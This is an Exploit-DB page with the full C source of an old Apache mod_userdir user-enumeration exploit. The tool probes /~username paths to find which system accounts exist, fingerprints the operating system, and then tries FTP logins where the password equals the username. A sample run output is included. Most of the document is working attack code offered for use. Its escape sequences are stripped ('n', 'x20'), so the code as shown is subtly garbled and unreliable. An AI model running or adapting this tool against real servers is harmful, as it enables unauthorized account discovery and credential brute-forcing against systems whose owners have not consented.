https://www.exploit-db.com/exploits/132

漏洞细节尚未披露

/* m00-apache-w00t.c
*
* Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* ~ Proof-of-Concept edition ~
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* Works only against Linux and *BSD boxes.
* Info: http://archives.neohapsis.com/archives/vuln-dev/2000-q3/0065.html
* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure information 
* about existens users accounts via wrong default configuration of mod_userdir 
* (default apache module). Then attempts to log on ftp with found logins.
* 
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
* 
* [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
* 
* [*] Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* [*] Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* [*] Searching complete.
* 12 users checked
* 2 users found
* [*] Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* [*] Complete.
* 0 ftp accounts found
* 
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21

int m00() {
printf("n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.nn");
printf("n[*] Downloaded on www.K-OTIK.comnn");
}

int verbose(char *d) {
printf("+-----------------------o0o-----------------------+n");
printf("n%s",d);
printf("+-----------------------o0o-----------------------+n");
}

int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]nn",xplname);
printf("Options:n");
printf("-p <port> - http port [80]n");
printf("-l <log_file> - log all attempts to filen");
printf("-b - try to log on ftp with guessed logins (public version only login:login)n");
printf("-h - usagen");
printf("n");
exit(0);
}

int attempt(char *argv);

int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}


int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;

char c200[0x05] =
"x20x32x30x30x20";
char c403[0x0e] =
"x34x30x33x20x46x6f"
"x72x62x69x64x64x65x6e";
char c404[0x0e] =
"x34x30x34x20x4ex6fx74"
"x20x46x6fx75x6ex64";
char signature[0x0f] =
"x53x65x72x76x65x72x3a"
"x20x41x70x61x63x68x65";
char *http =
"Accept: */*rn"
"Accept-Language: en-us,en;q=0.5rn"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn"
"User-Agent: m00-apache-fingerrn"
"Connection: closernrn";
char **logz;

m00();

if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}

if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }

if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]n",lfile);
exit(0);
}

if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]n",file);
exit(0);
}

logz = (char **)malloc(0x666);

printf("[*] Checking http server [%s:%i]...n",host,port);

hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1rnHost: %srn%s",host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" non Vulnerable => "); } else printf(" yesn Vulnerable => ");
if(!strstr(answer,c403)) { printf("non[-] Exiting...n"); exit(0); } else printf("yesn");
close(hand);

hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1rnHost: %srn%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);

printf("n[*] Searching for system accounts...");

if(lfile) {
sprintf(logd,"Host: %snFound accounts:n",host);
fprintf(logfile,logd);
}

x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == 'n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '';
x++;

printf("n %s t=> ",buf);


hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1rnHost: %srn%s",buf,host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%sn",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("n[*] Searching complete.n");
printf(" %i users checkedn %i users foundn",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:n");
fprintf(logfile,logd);
}
printf("[*] Attempting to log on ftp with login:login...n");
while(x!=f) {
printf(" %s:%s t=>",logz[x],logz[x]);
hand = conn(host,fport);

sprintf(request,"USER %sn",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

sprintf(request,"PASS %sn",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yesn");
if(lfile) {
sprintf(logd,"%s:%sn",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" non");
close(hand);
x++;
}
printf("[*] Complete.n");
printf(" %i ftp accounts foundn",i);
}
if(lfile) {
fprintf(logfile,"n");
fclose(logfile);
}

}
/* m00 */

// milw0rm.com [2003-12-06]